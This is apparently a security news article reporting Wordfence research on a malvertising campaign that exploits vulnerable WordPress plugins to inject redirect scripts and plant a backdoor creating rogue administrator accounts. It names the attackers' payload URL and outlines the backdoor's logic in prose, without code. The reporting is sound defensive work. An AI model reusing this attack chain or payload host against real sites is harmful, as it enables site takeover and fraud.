WordPress Plugins Anchor Widespread Malvertising, Rogue Backdoor Campaign

wordpress plugin malvertising

An ongoing attack on websites has added new exploits and an administrative backdoor to its bag of tricks.

A malvertising campaign redirecting website visitors and surfacing popups is plaguing the WordPress ecosystem, according to researchers, using known vulnerabilities in WordPress plugins as the attack vector.

The campaign has been ongoing all summer, with cybercrooks bent on redirecting website visitors to malware and fraud sites, according to researchers at Wordfence; they’re targeting vulnerable websites with outdated WordPress plugin versions to inject malicious JavaScript into the front ends to perform the redirects. However, recently new exploits have been added to the attackers’ repertoire, effectively widening the scope of the campaign – and, they have begun installing persistent backdoors on compromised sites.

The plugins being targeted include Bold Page Builder; Blog Designer; Live Chat with Facebook Messenger; Yuzo Related Posts; Visual CSS Style Editor; WP Live Chat Support; Form Lightbox; Hybrid Composer; and all former NicDark plugins (nd-booking, nd-travel, nd-learning and so on). Some of these have updated; others, like Yuzo Related Posts, have been removed from the WordPress.org repository and are no longer supported by their developers.

“The campaign picks up new targets over time. It’s reasonable to assume any unauthenticated cross-site scripting (XSS) or options update vulnerabilities disclosed in the near future will be quickly targeted by this threat actor,” said Mike Veenstra, writing in a blog post over the weekend. In fact, he noted that a flaw in the Bold Page Builder plugin was disclosed in August, and an exploit for it was added to the malvertising attack the next day.

As for the backdoor, the adversaries are exploiting administrator sessions to install an additional script into the website code.

“A short JavaScript block generates a new <script> tag on affected pages, sets its src parameter to https://yourservice.live/include.js, then executes it,” Veenstra explained. “The code contained in include.js is responsible for attempting to create a new user with administrator privileges on the victim’s site.”

Specifically, it executes a function called checkmeone() in order to test if a logged-in administrator is viewing the compromised page.

“If the user is presented with a _wpnonce_create-user nonce when visiting the site’s wp-admin/user-new.php endpoint, then the script knows a new user can be created,” said Veenstra. “If this is the case, the putmeone() function is triggered. This function makes an AJAX call via jQuery which creates the rogue administrator account.”

With that account set up, the attacker has free run of the site to install malware, change other code, deface the site or perform any other malicious activity.

The malvertising campaign is being launched from a single IP address belonging to a Rackspace server – most likely a legitimate webserver that has been compromised, Veenstra said. He added that Wordfence contacted Rackspace about the issue.

“At the time of this writing, attacks associated with this campaign are still ongoing,” Veenstra said. “We are continuing to track exploitation of new vulnerabilities, which may provide us with more unique payloads.”

Plugins continue to be an attractive target surface for WordPress’ attackers. According to a Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins, which extend the functionality and features of a website or a blog.

Interested in more on the internet of things (IoT)? Don’t miss our on-demand Threatpost webinar, IoT: Implementing Security in a 5G World. Join Threatpost senior editor Tara Seals and a panel of experts as they offer enterprises and other organizations insight about how to approach security for the next wave of IoT deployments, which will be enabled by the rollout of 5G networks worldwide. Click here to listen to the recorded webinar.


Suggested articles